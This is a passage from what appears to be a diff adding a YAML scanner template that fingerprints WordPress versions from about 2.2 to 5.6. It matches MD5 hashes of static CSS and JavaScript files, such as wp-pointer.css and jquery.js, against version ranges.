"(\"03387f19e695ffcce6b2bbcef4eacc3f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"1489f2a35f823f68c83976019fe84445\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"655c83f4842aefbb938674e7665adce9\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"ee4d04d2c5c499c1688ba37184e6f507\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c199a3e351b24d9a9f8a430d20e9140e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ff0f57179a095756247065a3cdb13e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b6f1ebbe7e429a30e78b3e57194c2b99\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"d5fbbc80155b5414f2a4da9c852bb9c0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"5f7e742e81a02e1181c35920268c8a51\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"73221f55eb1c209fe229f90739d83d37\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2220b30c104b1bfc28ce0d57294630ff\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"23aabbc47036a0feaaed7f25d4863cfb\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b5f2073fd98bf22e2f2b2353a2475f9f\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ebdfa9a5981fc4adc6421b8c8f2fbdab\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"4987695c2fdde552b9723a7a23eb33a4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f79e045e230423e774bbc42b7a1a7085\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2203b97d07d9fe77d9d39f2287e81c0f\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"ed5e5527b5bd5a5bca516e801dc1dc0b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"a3f07d2e699aff8d66db9352172f3c41\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"d166fa753a4ac9638dfcc8b53a3b844c\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"dad7c0350214e95c8c1a79d35f45fec7\" == md5(body))" + - type: dsl + name: 3.0 - 3.1.4 + dsl: + - "(\"1abfd70d037a1e2dff56fcccf1f6ab10\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"b6c8a448b7deb1e19bf999ea1872b2e3\" == md5(body))" + - type: dsl + name: 2.7 - 2.8.6 + dsl: + - "(\"8d9762bb606d52329ce469823b56119d\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"22448b7afc80e35414de05dc7d648e0b\" == md5(body))" + - type: dsl + name: 2.5 - 2.6 + dsl: + - "(\"573f2f2acef97cb56ad89ef9a3817854\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"166984f6b0e07f10e505addb8197d0fc\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"954b5c4a4a4f15fac61f4fc17bf58e61\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e6379fac5e741a344df826d46d84e69a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"3df6ed7e42905e3c50cee2540641492e\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"f19d0ab7d3f70930a10cd4b041a6e6bd\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"845b45ebe24b66d634755bb35a4327fd\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"e59be28d8c4b1ddb2b5b0c7200d85556\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0b4b36860bd56854766cf368240db3a5\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"a45df3bb81bd0080863cf69e7f98546e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"63c7307a8612335027f0fd90741a5777\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"308362946172efe2e4ec1a2255ac263c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-and-player.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"8970e6e672a1d312c8d8ef471ffb7d5f\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.5.23 + dsl: + - "(\"1490850465047bbde4cb3a08d257aa8e\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.1 + dsl: + - "(\"53972f85761d00c950a6554b55f46f29\" == md5(body))" + - type: dsl + name: 4.3.4 - 4.3.25 + dsl: + - "(\"7c839ada5992116eb525cabad56fec5a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.3 + dsl: + - "(\"1abc152ca7ae762a29ac997bc779a187\" == md5(body))" + - type: dsl + name: 4.2.8 - 4.2.29 + dsl: + - "(\"906a6c1b6d7568099ef0358ecafdd754\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.7 + dsl: + - "(\"a3a3353ab882870300207675fa6b1b83\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8240ce3d6dfd3ffaaa20d71c67b9e5dd\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"35a97e9df26614992044479b84cde48b\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"0015bf4818e9adf776ef6a35e791b855\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"89f8f0d4de00fe86d5a452bbb65bb02c\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"9075ef6303cc251092a0d6bfdd3a2093\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"0c279a4de1ca848917f96892e58345d2\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"c6d1f8e334ded732e83231a64de3fd3f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6de31d697a1b1b2b0e2a3b29b1fb458b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"4bd99a74dbfee792e9cde7c641ed51b7\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"456e10f2561e65f2b76c1985b657ebdb\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f2fbd40d135802525dedae9d5d02564e\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"6c3e135352318e69b359fc37bff0b3bc\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"5e414da7c33e52e8ee53ae20cc2c3bd8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"84e05e2ca97a0e4c401ef3a99ae61bd9\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"83a66b2977cbedbb9ba412606f1f13c1\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"264b969d3c1ba2cc8eb3df7fe4feaaaf\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"73c9bdb9277ec76f0d6842368f0cddf6\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"013fb2b4de66e81cb7378f931fc93ffb\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"a35fbcb6a0ef77a051a7415a11eb6027\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"249e68e8463fc816b70c106ea7001355\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"bbbacea8c1892bf4c4fead1e460fead7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"e98bb215ae58020de55852487229119e\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"7e9fd782602ead0ddd91ecbe600bb078\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f073040db3f47a4718a1711018ae9980\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"f2c8a14e896d48cb9f2c3367228ef562\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"51b755f1d00ecfe6c97c681b712a1f79\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b47a82b97d5d40971429a3cace9e8e24\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"3f78b74716ff99d6bc9f0101998d1633\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"2db0af168008dd4ba838cda3e111ebe4\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"09aba215976d5cba6afa711a1cd777f3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"f4911a0d886fb507fac33870531837ce\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"981c69b911ff9d4432bf82c080cfc7c7\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"9ee1087f5cd30436a78f4ae1ef9e53ae\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"1663817600108d76e57fbcb708a272f3\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"bfbbb17f5deaa73a3fffb7c639aca12e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b33603a27d12bd346e305a15d175ea11\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"89df3c3fdb1a28e9553addd2c0a51e2e\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"82eeae4c68288d28c8809ef9fb1bc3ea\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"42634848a1d576496e3a3fcc4848aa08\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"3d7c74b9bf7260ded6960f7d7c3f1e9c\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"83fefeea5786545e775f25941e482d13\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"60071f8937b8c3fad00dc801e715fa45\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"8f3b6483f012f1d94891105a97acefcf\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"7e45d0e701aead8de6f0e9ab63b15741\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"5c863bd1b2e60bb2dbff75f1b6051b0f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"59f806e4f2c05775d4716684d184bca2\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"dba6014d7ae5dad33ec8d7bad4d23d85\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"9f865744182beb7411b3ce6ab09a49db\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"8b0b4f07ee0da51fb5b48944e20b4c11\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d22ab774b9d7d1c7540d075a734baa89\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"799cbb233336f9dec91766a0a786c7c9\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"509195f639213b5e82163c84842a2fd8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"87cc1bc8d497f0b0a5ce8124c0befda3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.js" + matchers: + - type: dsl + name: 4.5.3 - 5.0.4 + dsl: + - "(\"8610f03fe77640dee8c4cc924e060f12\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"d2d3169ca79b3eabf7ca582222fbddd3\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"207abeb83412721d556faeba36e00822\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"4e2a6874f8b028fa23591492284a1643\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"25c76e632c1ee2f2d25292b72acc17d4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9f78bc4ac0da184bdd6733ffa7e5e599\" == md5(body))" + - type: dsl + name: 3.6.1 - 3.8.35 + dsl: + - "(\"92c9ccfa9216499d48ecc11e6d9887d5\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"9dcde2d5e8aeda556a0c52239fa2f44c\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"baae1db8cca4abb2265b0a6e01f1beed\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"d2985bb2ef1e276824161ffb6fa91338\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"6f79194a85c68f4e3c325aba0eeebd63\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"24cdab29f8a402a6f8f55e69dc56e429\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b600f5c9cc254ffca5501d2cfefa1a4a\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"518215c646beff570b8d9849429139d4\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"25e59325cb47d2ab5ea650d47f431a9c\" == md5(body))" + - type: dsl + name: 2.6 - 2.7.1 + dsl: + - "(\"5308064654748a85218f8cf04ac5f8e8\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"7cc62f895d635b404ae0a37c13dcd6c5\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"d5753af0d384857ca34bf8b54c5eb417\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"290a21c83be5e11f93b86ff1bf8d4cd2\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"bb33093a8d4f68199c4ab6702f3976e4\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.5.3 + dsl: + - "(\"49edccea2e7ba985cadc9ba0531cbed1\" == md5(body))" + - type: dsl + name: 4.5.18 - 5.0.11 + dsl: + - "(\"dc5ba5044fccc0297be7b262ce669a7c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3bbf6f33a2484805c30cf0e4a4b1d526\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/sodium_compat/composer.json" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"a3a1d156f395eb8f522dd29733e6f74d\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.3 + dsl: + - "(\"1969ec6eba483a0d2ba0672435bc086f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.5.3 + dsl: + - "(\"81e61d0416ef452b86358743d7cebf7d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"60d50bd04e4b70407da0a8158a0d8f7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-api.min.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"8ef51dc05352b2544201b31f7e2c2aa3\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.8 + dsl: + - "(\"5b04d3ac5a88211004528a50437a0b3c\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.4 + dsl: + - "(\"ba06e5f6f4f18e895c0c10ce1d3fef94\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"146b14e8c7935d8bd14eb521fb616a5e\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"632a0df5fc4f02477aa93f838530c4e0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"ac19f388e35cadb800170d1e65928cce\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"cfe6bf3aec2963dbdcddb2daa7ed129c\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"8cf9672daeca232b3c1f93b1e8d130b0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b7d6e1947ae62e2bcf6973d884b1a105\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"99b1ca16bcc61ef31b8874a6a516532e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b75b493914b2c89b9361c6e79622b5c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-pointer-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"eafe3262c7b7af6d8c71850eef377b1c\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"8bb0bef9034c514f114e05ff9fc63840\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5efef129253ea15d5742c8985a5e5acc\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"d7e0cd8698b0111eee1a6a5f8b4c924a\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"d1469cd4079832849dad2664ea765a40\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1ecc35e34576c2f9a22b31a04c05db4b\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"a2fdd3f6cecdad170c8b388b62451441\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"4711e5e8702a25a94284a833dd04cebf\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"d7ab0fb6d3a327f2fc6502591566656e\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"e186e8b2e5b4ad9ef0a083ca5886e1d7\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f42570055f49a16bcb1217a556e3049f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9799a726551e5c0f2dc8721e0701057c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b8f963b6af881302043b3170e8ad78bb\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"c0a39227c87b13e72b44fa2cd9cfb548\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ed0285f2d68006a3cce1d14f213fd6c6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/data.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"f8150bf25c1f1038994b1b21d31db081\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"cec32f67b9c0c87140fa5506316ba63e\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"07c02f5b612470483def32a975cd96cf\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d3bbd3eea7bbe3508e81ebd69f2c45d2\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ae925003420ddd0a00ca0b9dede3911e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"ab2ac3c24c6921bc62dead8f7a2267af\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"bdd721bf9bc67380f681a5aacbccc827\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"b1df6eefe4d9b8d17f003a25aa50d999\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cb8fd9b7446107dc460554e552138237\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9caf2f73114f2e3f111548fa0669f723\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/data.js" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"ddae0e533511267d25e72243e346d4b9\" == md5(body))" + - type: dsl + name: 5.0.2 + dsl: + - "(\"3b747c638a1a5115feda5deff0ba7977\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"8a70f593b4e1c7255d1477a5b943de61\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"709d82aee58b22ca25ec93d1c75e3a78\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d4dd45e5ed9e1a5015652407e00b2c2d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"c8bcea679c39308667547a54fef94033\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c0e04a64999dceed7d32e5455f7402d3\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"b212c688591871d0ff504bbb9f9e0b9c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9feabbcf952b4312e2cac9c5cf0dce2a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"64693be9b6a8e520d1ed862cb379d59e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/edit-post/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"3ef042e6dc51effffd675f5d8d67234d\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"a9da3ceda6dfce34b69fe1bc3b1f5ee6\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5383b047c37cd2d5c32d299959c98a12\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"43521c1618feed87b76ba61e7a1e1405\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"caf92f80f4c581ade5f5205f9a943029\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"58e016381723ce43b79381262b17cdff\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"adbce747f3f9a2a3505d0ec6a6bd56da\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"ed723421685d554887d928897ba9ca45\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0d62ac9769fb2588f888cb7b959c6e98\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6decca5ae4874d5c90a9d85e2e9d3f57\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/edit-post/style.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"e33bc955f23a2ccf06c284ff2b1c2a12\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"7d8068d9ae8977783cd06a11929f3b56\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4dea956ce093170c82bd7062d07064b8\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"719e21ee8faf57740ee065959f4f742f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"578e6bc0b5b398648956c85f5fecd801\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"029c6c1101d85e943386f69e65bf6f26\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"cd9314a77b72e3be21c45fa617d10a7f\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"fbf2f30961ba450c95233ebd563c64f5\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"06c30ccc5b4b2aeba1cba0cc1ace5ea4\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c0dc622a8bca4d16a05f59e19362fc17\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/media-models.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"eed9813bad592d4287be0eb0ebb68497\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"bc01c1de1fdb0176783247e8a754a60b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.24 + dsl: + - "(\"757f7c05171d7ab9fb8c6b4ed8a68aa0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"261fa850fde903097779eb27336f8c20\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b68e8e137e8507dc7341f42269c228e6\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9b857d69f581fdac6ebcdd81b856b856\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"def5272789e7da0fd60524d1ebf96a98\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"f0b1936032cc0dc2dab420241d891412\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"7dcae0648406b44bfe02151f2af361e2\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"6fbf98b8a1f49c729b0f50628b01b9f7\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"593e7c8882f465ea251aa3707010969a\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"b631c2ad1ed6830c14f1b5b746cc33b4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8581d9247dda1ddbdbc45bc7cba3a3fd\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"0e6f148cf0f67e2d29308754faef6829\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"25c8433aba855aa1839135b9e2d019b8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a372a9be9eb7e7e3a40e6f8c2bc52573\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"6ef4e6c8f6c08e1558bd9cb500e49b9c\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"a9329bba26e0cca4a47d899398f93117\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"540ad54618f4e167bd5eb00e305fd0f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-plugin-editor.min.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"ebd5a282a3cbe917233b9355f85e02e2\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"88918bacdc9909f8ca06a13085e33bb2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"cc1a6596f81f2efc3b0ef5882d8b4d00\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"31d01c6329bd9ca0f85d08d30571cedb\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"0c0b505c870b8e06552dbd22533f1de2\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"d7eeb3247587fe927808ab06acd7c64e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8dbc8c7e53f66b2da6a88bd90764a161\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/theme-plugin-editor.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"520d3d51ba9b168fd8ebdec6fe62355c\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"53b16e979e15d15b8665a518b3498b6c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9744d1c4fab5fcbc74d4d739b75f08e1\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"2d0388d3ce8f3e030adc78907f661184\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"268eba9cd3dcfde30616dcc01a44cf96\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c4f665635b50712ceeffcfe96419c116\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-profile.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"78429754e565545b0b996d327eb9b75a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - 